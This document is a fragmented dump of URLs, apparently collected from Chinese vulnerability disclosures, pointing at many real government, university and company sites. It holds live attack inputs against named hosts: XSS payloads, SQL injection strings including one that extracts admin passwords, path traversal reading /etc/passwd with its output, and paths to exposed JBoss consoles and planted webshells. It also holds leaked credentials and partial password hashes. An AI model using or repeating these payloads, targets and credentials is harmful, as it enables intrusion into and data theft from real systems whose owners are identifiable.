url:http://v9.demo.phpcms.cn/index.php?c=com_index&m=yp&userid=46%22%20%3E%3Cscript%3Ealert%281%29%3C/script%3E http://www.epweike.com/index.php?do=article&art_cat_id=594&art_id=22664 data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4= http://www.fecb.com.cn/ http://www.tudou.com/home/vlog/view.do?vlogId=20009261&uname=_334485212 http://openapi.baidu.com/oauth/2.0/authorize?confirm_login=1&response_type=code&redirect_uri=http%3A%2F%2Fpassport.iqiyi.com%2Foauth%2Fcallback.php%3Ffrom%3D1&state=60ecc48c7737bdeaba5d7f499e0392d6&display=page&client_id=VdUQE9922EiS7Qb5N7oFGX8s http://openapi.baidu.com/oauth/2.0/authorize?confirm_login=1&response_type=code&redirect_uri=http%3A%2F%2Fpassport.iqiyi.com%40www.wooyun.org%3Fpassport.iqiyi.com%2F&state=60ecc48c7737bdeaba5d7f499e0392d6&display=page&client_id=VdUQE9922EiS7Qb5N7oFGX8s http://passport.iqiyi.com@www.wooyun.org?passport.iqiyi.com/ http://118.194.34.35/ http://118.194.34.35/validate/over.asp?type=d&providerid=018000005652 http://learn.seeyon.com/login!loginIndexPage.action http://www.tudou.com/home/vlog/_334508420 http://www.tudou.com/home/item/search.do?keyword=%3Cimg+src%3D%23+onerror%3Dalert%281%29%3E&uname=_334485212 http://my.360tiku.com/send_pass.asp http://118.194.34.36:8080/help/ http://www.smeah.gov.cn/pub_index.action http://edit.autohome.com.cn/admin/security/login.aspx http://oa.corpautohome.com Client:2**.1**.3*.30 http://mz.5see.com/ http://usermz.5see.com/ http://203.95.110.97/ http://www.fzgs12366.cn/client/register/initReg.do福州市国家税务局直属税务分局 http://www.zjkxzfw.gov.cn/index/index!list.action http://www.bzxzfw.gov.cn:8080/index/index!list.action http://www.qxzwdt.gov.cn/articleView/articleView!show.action?categoryCode=zxdt&article.id=341987&domainCode=nt http://www.caasc.gov.cn/articleView/articleView!show.action?categoryCode=ckfb&domainCode=nt http://www.ldyx.org/index.php?m=admin&c=index&pc_hash=MvGSp5 http://xiage.yy.com/convert/index.php?a=config&source=d7.2_x1.5 http://www.heagri.gov.cn/hbagri/more_pic.jsp?siteid=0&lanmu_id=2。 http://211.151.164.53 http://kdeas.kingdee.com/easWebClient/logs/ http://bbs.weiqi.tom.com/utility/convert/index.php?a=config&source=d7.2_x2.0 http://club.eset.com.cn/convert/index.php?a=config&source=d7.2_x2.0 http://122.11.51.232/mysql/ucenter.sql letter.ccidnet.com/phplist-2.10.14.rar http://ccidstudy.ccidnet.com/data/存在遍历 http://www.cofco-property.cn/web.config.bak http://v9.demo.phpcms.cn/index.php?a=lists&areaid=1%22%20onmouseover%3dalert%28/xss/%29%20bad%3d%22&c=index&catid=0&m=yp&modelid=15&page=&price=&tid=1 http://v9.demo.phpcms.cn/index.php?a=lists&areaid=&c=index&catid=0&m=yp&modelid=15&page=&price=&tid=4%22%20onmouseover%3dalert%28/xss/%29%20bad%3d%22 http://v9.demo.phpcms.cn/index.php?a=lists&areaid=&c=index&catid=0&m=yp&modelid=15&page=&price=1%22%20onmouseover%3dalert%28/xss/%29%20bad%3d%22&tid=1 http://mail.dzwww.com www.hebmz.gov.cn http://www.hebmz.gov.cn/next.jsp?ID=06 http://www.hebmz.gov.cn/login.news http://www.dl12333.gov.cn/rcfwzx/rsks/pages/c6i061.aspx http://www.dl12333.gov.cn/_layouts/LssbwebSite/D0101/C6I061/C6I061.aspx?cgcb00=339 http://v.umiwi.com/profile/getCtimeByUid/?uid=1 http://ucenter.zhulang.com/data/avatar/000/17/24/02_avatar_middle.jpg/s.php http://ec.yto.net.cn http://www.gmrbank.com.cn/cpjs/index_1167.aspx?cid=2%20and%20user%3E0 http://www.114mall.cn/home/index.aspx http://hd.chinatax.gov.cn/guoshui/action/InitLocalTax.do?tag=1110000 http://hd.chinatax.gov.cn/guoshui/action/InitLocalTax.do?tag=1210200 http://202.108.90.171/guoshui/action/InitLocalTax.do?tag=2340000 http://hd.chinatax.gov.cn/guoshui/action/InitLocalTax.do?tag=1150000 http://202.108.90.171/guoshui/action/InitLocalTax.do?tag=2340000 http://www.bjsat.gov.cn/guoshui/action/InitLocalTax.do?tag=1110000 http://hd.chinatax.gov.cn/console/login/LoginForm.jsp http://shenpi.yuzhou.gov.cn/OnlineQuery/QueryDetail.aspx?QueryId=635 25555555.com/menpiao/menpiao/MenPiaoList.aspx?key=xx&type=1 http://antispam.telecom-sh.com/authority/umpass/checkAndSend, ftp://220.249.191.189/ http://docshare.mingdao.com/DocList.aspx?key=%27%20or%20%27%27=%27 http://open.tianya.cn/oauth/authorize.php?oauth_token=e65d28ab0862cbd517c67c3cc6f2247e052ad9c22&oauth_callback=http%3A%2F%2Fm.wbto.cn%3A80%2F%3Fc%3Dm_setting%26m%3Dauth%26b%3Dcallback%26pid%3D24%26aid%3D%26wbto%3D1658628_953c148f2d%26oauth_token%3De65d28ab0862cbd517c67c3cc6f2247e052ad9c22%26oauth_token_secret%3D2fde10390cd1a2477abaa3dcd44e4b99 http://www.dajie.com/vote/vote_detail/3387 http://baike.baidu.com/create/%27%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cimg%3E%27%27%27%27&enc=gbk http://211.151.164.209/ http://211.151.164.209:80/ http://m.dangdang.com/sms.php?k=f68a138f19F http://www.ubabytv.com.cn/knowledgelist.php?id=1 http://apple.com:/@/www.wooyun.org/ http://en.wooyun.org/bugs/wooyun-2013-014 http://www.ecshop.cn/compare.php?goods[]=14&goods[]=23%22%20onmouseover%3dalert%28/xss/%29%20bad%3d%22&goods[]=32&goods[]=13&goods[]=3&goods[]=7&goods[]=9 http://221.174.24.109:8020/index.action http://www.yooli.com/global/logout.jsp http://www.yooli.com/global/logout.jsp[/img http://www.yooli.com/bbs/posts/list/2679.page http://www.yooli.com/bbs/posts/list/2683.page http://www.yooli.com/bbs/jforum.page?action=insertSave&module=bookmarks&relation_id=2683&relation_type=2&title=B1acken&description=&visible=1 http://www.zjna.gov.cn/ecoi/upload.jsp http://www.zjna.gov.cn/ecoi/lee/upload.action http://www.motel168rates.com/Mains.aspx?city=sh ftp://115.182.51.26/ http://115.182.51.44/phpinfo.php http://115.182.51.144:8000/uploadsys.php.bak http://115.182.51.144:8000/login.php.bak http://61.191.25.187/ http://58.83.219.80 http://58.83.219.80/download http://www.ahchcz.gov.cn:9001/chgzcx/index.action http://pkda.pukou.gov.cn/index.htm南京浦口区档案局 http://m.netcoc.com/www/mlog/user.php?id=82479 http://tjdx.lncom.gov.cn/tjdx/Index.action http://218.58.70.195 http://218.58.70.195/notice/noticeDetail?pk=8796158664513 http://dzzl.mlr.gov.cn/ http://dzzl.mlr.gov.cn/datagateway/index.action http://218.94.1.157:8000/ http://www.longre.com/Admin/ http://chinaooh.net/index.php?r=cCenter/Public/News&id=128 http://www.bjhdcz.gov.cn:9998/Hotspot/publish.do?opreator=more&city=1 http://www.bjhdcz.gov.cn:9998/Hotspot/publish.do?opreator=more&city=2 http://www.bjhdcz.gov.cn:9998/Hotspot/publish.do?city=1 http://223.202.5.5/ http://vi.iflytek.com/ http://vi.iflytek.com/web-console/ http://vi.iflytek.com/jmx-console/ http://vi.iflytek.com/shell.jsp http://ah2.zhangyue.com/zybook/u/p/user.php?usr=i12656651 http://ah2.zhangyue.com/zybook/u/p/user.php?action=userInfo&usr=i12656651&datatype=json http://research.iflytek.com http://research.iflytek.com/wp-admin/ http://research.iflytek.com/wp-content/themes/twentyeleven/iis.php http://zhiyuan.iflytek.com/ http://zhiyuan.iflytek.com/www.rar http://zhiyuan.iflytek.com/manage/editor/admin/default.php http://zhiyuan.iflytek.com/manage/uploadfile/201312/20131216043106657.php http://www.lenovoprinterclub.com/cases_detail.php?contentid=44 http://lenovoprinterclub.com http://lenovoprinterclub.com/cases_detail.php?contentid=44 http://cjgov.iflytek.com http://cjgov.iflytek.com/ftb.imagegallery.aspx http://m51buy.imxiaomai.com/new_findpwd2.aspx?userphone=用户手机号 http://m51buy.imxiaomai.com/new_regpwd.aspx?usercollege=9&userphone=用户手机号&username=测试 http://www.imxiaomai.com/alterphone2.aspx?phone=11111111111&oldphone=11111111112 http://115.182.9.221/ http://mail.zto.cn/ http://www.tpri.gov.cn/news/html/?95.html http://www.tpri.gov.cn/news/html/?95'.html http://www.tpri.gov.cn/news/html/?95'/**/and/**/'1'='1.html http://topic.xcar.com.cn/201103/fml/lb.php?page=48&t=66&sn_id=3 http://m.webapp.58.com/deleteinfo/信息编号 http://i.webapp.58.com/bj/zufang/信息编号x.shtml?isself=1&&utps=1387022252000","catId":"1|8","browse":"5 http://115.182.9.17 http://115.182.9.17/OpenResultServlet.do?filepath=/etc/passwd http://115.182.9.17/OpenResultServlet.do?filepath=/etc/shadow http://www.chnpec.com http://211.80.224.35/PRTVUWeb/pages/status/querystudentinfo.jsp http://xxgk.yantai.gov.cn/list_xxgk/dept_list.jsp?dept=CKJGQ可以盲注 http://zoom.tom.com/images/login_0.jpg/.php http://mts.zte.com.cn http://mts.zte.com.cn/Mtsmap/CustomerLogin.aspx site:www.ahtd.org.cn http://sy.800pai.com/detail.php?tg_id=144 http://api.cbox.cntv.cn/api/column_detail?pid=ukztYUybsWanMQcNKADef2gE9piG4h6d&version=1.0.4&columnid=C10336 tsmzj.gov.cn/Yosef.asp;.txt,通过网站后门可以获得网站管理权限,查看所有文件路径,有编辑,删除,复制文件等权利。网站信息泄露。 http://220.181.10.80/portal/ http://www.kumi.cn/360/xiaoyouxi/game.php?content=20255 http://pic.onlylady.com/files/download.php?file=../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin avahi-autoipd:x:100:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin lyb:x:0:0::/home/lyb:/bin/bash yalino:x:0:0::/home/yalino:/bin/bash mysql:x:500:503::/export/home/db/mysql:/bin/bash yushouyang:x:0:0::/home/yushouyang:/bin/bash uuidd:x:101:104:UUID daemon:/var/lib/libuuid:/sbin/nologin http://pic.onlylady.com/files/download.php?file=../../../../../../../../etc/issue http://www.phpstat.net/的分析监测代码时候,其内嵌的JS文件(http://www.phpstat.net/qq/templates/default/default/js/qq.js)会发送后台请求,并获取到用户的QQ号码,详细见截图。 http://www.qhjt.gov.cn http://www.qhjt.gov.cn:10000/qhjt/message/showAll.action http://special.bydauto.com.cn http://special.bydauto.com.cn/special/f3rhd2/show.php?id=1306 http://www.igocctv.com,据说是“中央电视台唯一的电视购物官方网站”! xxxxxx2FRNnRk1:15580:0:99999:7 mxxxxxx0vpsaeMOiJaHfHw1:15952:0:99999:7 encap:Ethernet A4:BA:DB:42:68:09 addr:192.168.195.17 Bcast:192.168.195.255 Mask:255.255.255.0 a6ba:dbff:fe42:6809/64 Scope:Link MTU:1500 packets:6869089290 packets:5390431831 txqueuelen:1000 http://duoshuo.com/features/?feature_id=1 http://58.215.167.50/index.asp http://www.wanda.cn/api.php?op=feedback& http://lbs.189.cn/wwwroot.rar http://wq.tom.com/images/swfupload/swfupload.swf文件对movieName参数过滤不严格,存在flash http://wiki.ops.cctv.com/dashboard.action http://viptv.pptv.com/activity/yearvipfree http://bureau.cctv.com/default.php http://bureau.cctv.com/ziliaoku.php?z_id=113 http://zhandian.cctv.com zhandian.cctv.com/webs.php?id=20 user:readonly_v2@% http://www.anjuke.com/ajax/qa/ http://www.cctvdream.com.cn/about.php?id=9 http://wooyun.org/bugs/wooyun-2010-011296 http://www.xzdzj.gov.cn:8008/1.txt http://www.zjyh.gov.cn/start.action www.cbi.gov.cn:8080/wiseroot/content_xicon/121235.xls www.cbi.gov.cn右边登录还真进去了。 http://115.182.35.80/login.jsp http://vdn.apps.cntv.cn/api/getVideoInfoForCBox http://www.xiaolan.gov.cn/bm/news.php?id=162 http://health.yonyou.com/admin/FCKeditor/editor/filemanager/upload/php/upload.php http://health.yonyou.com/admin/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media http://城市名字的拼音(如:changsha).kingdee.com:80/ http://feedback.chinanews.com/ci/ http://feedback.chinanews.com/ci/database_bak/ http://feedback.chinanews.com/ci/database_bak/feedback_2012_10_10.sql http://feedback.chinanews.com/ci/index.php http://member.aili.com/ http://space.aili.com/uc_server/data/avatar/001/09/46/14_avatar_big.jpg?random=3387 http://golf.cctv.com/court1209/court.php?do=terminal&domain=list&type=1&id=319 http://xm.zskjj.gov.cn/redirect.action jdbc:oracle:thin:@localhost:1521:ZSK打码 http://www.360qc.com/main/channel_tofront.action?parentId=361 http://www.360qc.com/main/channel_tofront.action?parentId=346 http://www.360qc.com/main/channel_tofront.action?parentId=747 http://www.360qc.com/main/channel_tofront.action?parentId=756 http://jwc.nau.edu.cn/ http://jwc.nau.edu.cn:80/ http://www.bjbskj.com/newsdetails.asp?id=468 http://www.bjbskj.com/newsdetails.asp?id=468 http://www.bjbskj.com/admin/login.asp http://www.bjbskj.com/admin/w78eWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=d.asp http://www.wandaplazas.com/ http://www.wandaplazas.com/api.php?op=feedback& http://www.zhongfuti.com/Trade/Dlt/Project_Info.html?id=103233 http://sports.titan24.com/qipai/app/zhuanti/index.php?cid=916 http://sugar.jiankongbao.com/index.php?module=Home&action=index http://hr.bjd.com.cn http://event.youku.com/siemens-home/openthekitchen2013/save.php?action=videourl&id=2 http://sd.189.cn(山东站) http://sso.pengpeng.com/register-v2 http://127.0.0.1/easethink/message.php?act= http://127.0.0.1/easethink/link.php?act=go&city=fujian&url= http://www.kumi.cn/qq/xue/player.php?id=32371 http://zixun.kumi.cn http://passport.zjrc.com/Jobs/Search http://passport.zjrc.com/Jobs/Search?js_keytype=1&js_key=%E9%98% http://passport.zjrc.com/Jobs/Search?js_keytype=后边当然是我的cookies接收地址了。这个时候就用到了贵站的论坛里了。 http://club.zjrc.com/forumindex.aspx http://club.zjrc.com/usercpprofile.aspx http://waibao.sogou-inc.com/ http://eps.edong.com http://eps.edong.com/admin/kickback/custdetail.php?member_id=21853 http://bbs.21cn.com/ http://s.wanda.cn/万达商户平台登录密码可以重置。……………………OMG http://www.kumi.cn/ysweb/xue/player.php?id=32371 http://www.kumi.cn/360/xue/player.php?id=26013 http://www.kumi.cn/360/xue/player.php?id=26013 http://www.kumi.cn/ysweb/xue/player.php?id=32371 http://121.52.220.27/news_detail.php?articleId=25 http://hbtc.cnhubei.com/Search.aspx?key=11%u90095 http://360kan.union.tudou.com/kan/play?md5=11e08af9e16f8a31&site=tudou&title=%E7%AB%A0%E5%AD%90%E6%80%A1%22%E9%99%AA%E7%9D%A1%E6%A1%88%22%E5%AE%98%E5%8F%B8%E8%8E%B7%E8%83%9C+%E8%A2%AB%E5%91%8A%E5%A4%96%E5%AA%92%E5%8F%91%E9%81%93%E6%AD%89%E5%A3%B0%E6%98%8E&url=http%3A%2F%2Fwww.tudou.com%2Flistplay%2F6VJzjS-aQrI%2FsgXrngp_GDQ.html&tag=%E7%AB%A0%E5%AD%90%E6%80%A1&category=1&cover=http%3A%2F%2Fp1.qhimg.com%2Ft0161f87a62d2f3ad7c.jpg&duration=71&vtab=yule&km=11e08af9e16f8a31&s=4ff4d9d77698da6de6f90a152cc7a209&usetab=none&qq-pf-to=pcqq.group http://game.gfan.com/ http://click.21cn.com/ user:admin pwd:21cn http://tcl.iqiyi.com/ http://tcl.iqiyi.com/upload/1387351273535.jpg/.php http://www.xd.com/zhaopin?id=449&category=%E6%8A%80%E6%9C%AF%E7%A0%94%E5%8F%91%E7%B1%BB&title=PHP%E8%BD%AF%E4%BB%B6%E5%BC%80%E5%8F%91%E5%B7%A5%E7%A8%8B%E5%B8%88 www.xd.com http://www.xd.com http://pimapi.lenovomm.com/bm/index.html?success=true http://pimapi.lenovomm.com/bm/page/feedback/feedbacktable.jsp?random=1377599101188 http://www.nmgcx.gov.cn/SoisWeb/home/index.html com:8080/ exp:http://baike.qmango.com:8080/plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60%29+and+%28SELECT+1+FROM+%28select+count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select+CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60+limit+0,1%29,1,62%29%29%29a+from+information_schema.tables+group+by+a%29b%29%23@%60\%27%60+]=a com:8080/dede/ com:8080/phpwebbackup.php com:8080/wuyun.php http://www.jsca.com.cn/wrcFront/wrc_info.do http://www.theti.org/ inurl:eol/homepage/common/ http://conf.cnki.net/UserDo/UserRegister.aspx https://czcatv.com.cn:7071/zimbraAdmin/ www.okpay365.com https://login.okpay365.com/register/register_doRegister.action https://login.okpay365.com/css3.jsp http://support.icafe8.com/?author=1 http://www.wooyun.org/impression http://allstartv.pptv.com/portal.php?mod=topic&topicid=12%22 http://zone.pptv.com/shininghouse/upload### http://www.powercdn.com/agentcdn/me_logger/logger?startdate=2013-12-13&stopdate=2014-01-03&logtype=1 http://www.powercdn.com/agentcdn/me_financedetail/financedetail/index?financedetail[bank]=&financedetail[buytime]=&financedetail[financetype]=1 http://www.powercdn.com/agentcdn/me_order/order/view_order/866 http://www.gzfz.gov.cn/ http://www.gzfz.gov.cn:8180/xmk/proListView!init.do http://www.hzsafety.gov.cn//newsIndex/getIndex.do http://www.czssafety.gov.cn/oa/?lm=1&sumlb=124 http://www.xasafety.gov.cn/ http://www.xasafety.gov.cn/newsshow.asp?cid=21&iid=2135 http://www.flyhigh.com.cn/skin/default/js/articleComment.php?classid=7 http://www.flyhigh.com.cn/skin/default/js/articleComment.php?classid=7&id=736 http://219.143.251.250/names.nsf?Login http://oact.jdbchina.com/ http://cuapply.jdbchina.com/Budget http://v.pptv.com/show/7JB8ibmLIOHbZV78.html http://dangjian.wahaha.com.cn/party/AdminAction_login.action http://xiste.cn/ http://www.xsite.cn/demo/xsite.php http://www.xsite.cn/admin.php http://www.php.net.cn/admin.php http://siteteam.cn/admin.php。 http://acm.uestc.edu.cn/20120225.backup.tar.gz http://i.sohu.com/a/app/friend/friend/add.do?xpt=emhhb3lhbmxpbmcxMzhAc29odS5jb20%3D&from_type= http://i.sohu.com/a/app/mblog/save.htm?_input_encode=UTF-8 http://i.sohu.com/a/v2/profile/service/updatedetaildesc.htm?_input_encode=UTF-8 http://bmln.i.sohu.com/a/whisper/send.htm?_input_encode=UTF-8&nick=%E7%AC%94%E5%A2%A8%E6%B5%81%E5%B9%B4&sname=bmln&content=csrfcsrf http://www.netinnet.cn/case.asp?sid=656 http://drops.wooyun.org/papers/178 http://www.wooyun.org/searchbug.php?q=jboss http://202.116.95.7/web-console/ http://219.219.35.4:8080/web-console/中国矿业大学管理学院会计系 http://219.223.10.16:8080/web-console/ http://59.77.47.248:8080/web-console/ http://218.104.52.218:8080/web-console/无锡商业职业技术学院会计金融学院会计实习中心 http://113.204.166.67:8080/web-console/重庆城市管理职业学院会计与贸易系会计实习系统 http://121.251.255.44:8080/web-console/ http://222.133.182.253:8080/web-console/ http://58.244.94.49:8080/web-console/ http://202.100.91.165/web-console/ http://121.10.160.138:8080/web-console/ http://210.42.124.251:8080/web-console/武汉大学经济与管理学院基础会计实训教学平台V4.0 http://gxyxoa.com:8080/web-console/广西银行学校综合实习平台 http://wzw.hznu.edu.cn:8080/web-console/杭州师范大学钱江学院经济管理分院 http://cksx.gxibvc.net:8080/web-console/广西国际商务职业技术学院财会金融系 http://121.10.160.138:8080/web-console/ http://210.42.224.96:8080/web-console/ http://218.29.67.248:8080/web-console/河南财政税务高等专科学校会计系成本会计实训教学平台V6.0 http://211.66.88.4:8080/web-console/广东农工商职业技术学院会计实训教学平台V6.0 http://218.64.220.6:8080/web-console/ http://125.221.35.114:8080/web-console/武汉软件工程职业学院商学院会计实训教学平台V6.0 http://119.6.103.5:8080/web-console/ http://219.217.240.65:8080/web-console/ http://120.42.37.3:8080/web-console/ http://demo.netinnet.cn/web-console/ http://sk.netinnet.cn/web-console/ http://demo.netinnet.cn/netinnet_cwfx_v52/help/ http://www.pigai.org/fankui/write.php?id=1 http://www.dj.cc/ http://www.vipabc.com.cn/program/search/ajax_s_query_record.asp http://abc.yaolan.com/ceshi/adminReport.action http://www3.ftchinese.com/app/logo_2010/singlework.php?id=FTC20149 DB:blogs Table:wp_users DB:mysql Table:user http://60.10.8.130:8080/admin/manager.jsp http://open.dodonew.com/front/addGame.jsp http://wan.dodonew.com/,完全可以进行脱库 http://ofvf.onefoundation.cn/ http://tao.admin5.com/web.rar http://www.cpse.com.cn/news.php?ac=info&act=about&opt=news&id=185%27%20and%201=%271 http://wahaha.tom.com/1.php http://kecheng.lyce.cn/shopadmin/index.php?ctl=passport&act=login&sess_id=1 http://bbs.21cn.com http://bbs.21cn.com/config/config_global.php_bak http://bbs.21cn.com/config/config_ucenter.php_bak http://www.pbfda.gov.cn:7080/powerSD/login.action http://6.cn/baby/profile/index.php?u=1 http://6.cn/baby/admin/login.php http://nanhai.hinews.cn/convert/ http://nanhai.hinews.cn/convert/index.php?a=config&source=d7.2_x1.5 http://bbs.hjsm.tom.com/convert/ http://bbs.hjsm.tom.com/convert/index.php?a=config&source=d7.2_x2.0 http://zhaoyangonline.com http://zhaoyangonline.com/reg.asp?userid=19470 http://219.141.216.136 http://www.lenovonetworks.com/asp/index.asp http://12345.hinews.cn/page.php?xuh=363 http://12345.hinews.cn/pin_lfbbc.php http://book.hinews.cn/ http://book.hinews.cn/search.php?chid=&sid=0?searchword=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%85%B3%E9%94%AE%E5%AD%97&caid=0&ccid4=0&indays=0&ordermode=0&searchsubmit=1&orderby=createdate http://book.hinews.cn/list.php?caid=27 http://book.hinews.cn/archive.php?aid=541347 http://www.hainan20.net/page_skzb.php?xuh=172 http://www.shinyv.com/css_edit/css.php http://zyjy.xtsxzfw.gov.cn/admin/index.aspx http://tmtoa.tcl.com/CTS/DigiFlowAssessTable_2012.nsf/ http://www.wumart.com/search.aspx?page=1&cType=1&kw=1一个搜索框的注入。 http://www.lemanarc.com.cn/template3.php?id=1 http://phone.tompda.com/view.asp?fulei=1 http://shop.tompda.com/mall/qiaoview.asp?mid=11149594 http://life.foxconn.com/UserLogin/handRegister.action http://www.xuancheng.gov.cn/portal/index.htm http://www.xuancheng.gov.cn/zmhd/askview.php?id=4267&pages=2 http://ahshiliang.gov.cn/ http://ahshiliang.gov.cn/info.php?left=1&cat_pid=67 http://111.13.46.101/www.tar.gz http://111.13.46.101/api/public.php?type=4&zid=1%20and%20if%28%281=1%29,1,%28select%201%20from%20mysql.user%29%29%23 http://111.13.46.101/vcode/me.php http://113.107.24.234/data/feedbackimg/867_20131219dvpudo.png/1.php inurl:admin,拿到以下连接,看了看,没动 http://admin.gb87.com/Admin/left.html http://admin.gb87.com/admin/Audit/ExternalUserList.aspx http://admin.gb87.com/admin/OutUser/UserList.aspx?PermissionID=1 http://admin.gb87.com/Admin/TradeCenter/List.aspx http://admin.gb87.com/Admin/Ad/FloatAd.aspx?PermissionID=99 http://admin.gb87.com/Admin/left.html http://admin.gb87.com/admin/Audit/ExternalUserList.aspx http://admin.gb87.com/admin/OutUser/UserList.aspx?PermissionID=1 http://admin.gb87.com/Admin/TradeCenter/List.aspx http://admin.gb87.com/Admin/Ad/FloatAd.aspx?PermissionID=99 http://www.zooq.com/ http://zikao.hneao.cn/net/pages/net/found_bkd_list.jsp?site_code=010106 http://zikao.hneao.cn/self-study http://www.scut.edu.cn/qgysp/ http://202.38.194.195/qgysp/view.php?n_id=1947 http://202.38.194.195/ http://ideaservice.lenovo.com.cn/ts/login.aspx http://ideaservice.lenovo.com.cn/ts/login.aspx http://i.sohu.com/a/app/mblog/delete.htm?id={$id http://i.sohu.com/a/app/friend/friend/add.do?xpt=aXNtaWxlbnRAc29odS5jb20=&from_type=usercard&pageid= http://www.dell-solution.com/ActivityInfo.aspx?id=516 http://www.wanda-cti.com http://www.wanda-cti.com/index.php?a=get_days&c=index&catid=7 http://edong.com/Host/Gspace_list.aspx?Product_ClassId=1&line_Id=3 http://www.edong.com/Host/host_index_list.aspx?Product_ClassId=1&line_Id=1&i=0 http://www.edong.com/NLG/Default.aspx?NLGTopic=31&NLGTopic1=31&NLGTopic2=31&NLGTopic3=31&NLGTopic4=31 http://edong.com/News/Default.aspx?Newsclid=39 http://www.edong.com/admin/OWeblogin.aspx http://222.75.160.166/login.jsp http://brand.66wz.com/store.php?id=18 http://ncda.xamwsj.gov.cn/login.action data:text/html;base64,PFNjcklwdD5hbGVydCgyKTwvU2NyaVB0Pg== http://lenovoprinterclub.com http://www.lenovoprinterclub.com/about_procontent.php?contentid=18 http://www.lenovoprinterclub.com/newscontent.php?contentid=83 http://www.lenovoprinterclub.com/newsconten http://sqlmap.org http://dynamic.766.com/simulator/dnfbs/search/count_keyword http://www.fulinmen.com.cn/FCKeditor/editor/filemanager/connectors/test.html http://www.fulinmen.com.cn/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/d:/web/www.fulinmen.com.cn http://sy.leconte.com.cn/LoveHome/main.html http://www.hebmaj.gov.cn/shownews.asp http://www.17u.cn/dujia/AjaxCallNew.aspx?lineId=40202&MId=113&type=GetPrintContent www.17u.cn/dujia/AjaxCallNew.aspx?lineId=40202&MId=113&type=GetPrintContent http://www.lhjk.gov.cn/web_com/lhjk/offer_advice/init.action?flag=0 http://www.hzbiz.gov.cn/page.action?pid=3193 http://life.21cn.com/life.zip http://class.examw.com/player/teacher.asp?ClassID=35&tid=2 http://www.bhdy.gov.cn/ http://www.bhdy.gov.cn/bhhsGuide/user.do?method=userhomeInfo&authorId=1280 http://www.bhdy.gov.cn/bhhsGuide某处可以查看1278个初始的账户密码:123456 http://jjc.xjedu.gov.cn/index/index.php http://jjc.xjedu.gov.cn/xj_view.php改成http://jjc.xjedu.gov.cn/admin变成功进入后台! http://jjc.xjedu.gov.cn/index/index.php http://design.gbicom.cn/dede/ http://www.51zhangdan.com http://www.51zhangdan.com/manage/ https://www.51zhangdan.com/manage/ https://183.129.178.139/manage/ http://passport.zte.com.cn/editorial/ztecn/ch/author/check_user.aspx?user_name= http://jjzx.nau.edu.cn/zlgc/ http://jjzx.nau.edu.cn/zlgc/admin http://bbs.cnfol.com/utility/convert/ http://bbs.cnfol.com/utility/convert/index.php?a=config&source=d7.2_x2.0 http://faq.xiaomi.cn/message/new.html http://120.31.133.202/226/xxxxx.tar http://deskadmin.cctv.com http://deskadmin.cctv.com/playsort.php?localid=60 http://xxgcx.sccc.edu.cn/pthbm/ http://www.pzhaic.gov.cn:7010/article!detailBAGG.action http://gssns.whhd.gov.cn/dhb/index.html http://www.9nuo.com/mobile/index.asp?id=48&act=content tu.roowei.com/Album/?Album_ID=5232&Indexes=1&width=1366&height=768 line:426 http://xlzx.nau.edu.cn/源码直接下载 http://xlzx.nau.edu.cn/1.rar http://xlzx.nau.edu.cn///安装说明.txt http://www.crfeb.cn/rcpd/bargain/web/login.asp http://iaep.nau.edu.cn/admin/ http://2012b2c.juneyaoair.com/ http://movie.weibo.com/movie/site/search?q=xss http://www.tcm.gov.cn/tcm/ztnews.asp?id=1 http://www.ecb.chinanetcenter.com/shop_admin/forgot.php http://bz.5sing.com/down/1683980 http://www.panshi.gov.cn http://www.qdpa.gov.cn/MoreNewsList.aspx?Permission_ID=P002_001*&pageindex=1&str= http://www.sdpa.gov.cn/DetailNews.aspx?NewsID=2834&MenuID=P002_003_003* http://123.233.247.74/wjj_site/ldaplogin/login_login.action http://www.renhua.gov.cn/website/portal/PortalAction!index.action http://passport.womaiapp.com/登录跳转的系统就可以可以看到了。 http://ued.ctrip.com/blog/wp-login.php http://sp.nanning.gov.cn/nnzw/GscApproveProject/index.action http://emp.xungsoft.com/zjkcmcc/index.aspx http://zxxx.hebxzxy.gov.cn:8080/portal/index.action http://www.ciqbridge.gov.cn:8080/regent/loginoa.action http://ybxm.nbhrss.gov.cn/webapp/xssb/zhjfwwcx/index.action http://admin.angelcrunch.com http://zjcredit.zjdpc.gov.cn:8000/Default.aspx http://zjcredit.zjdpc.gov.cn:8090/credit/dynamicnewsAction!toDetail.action 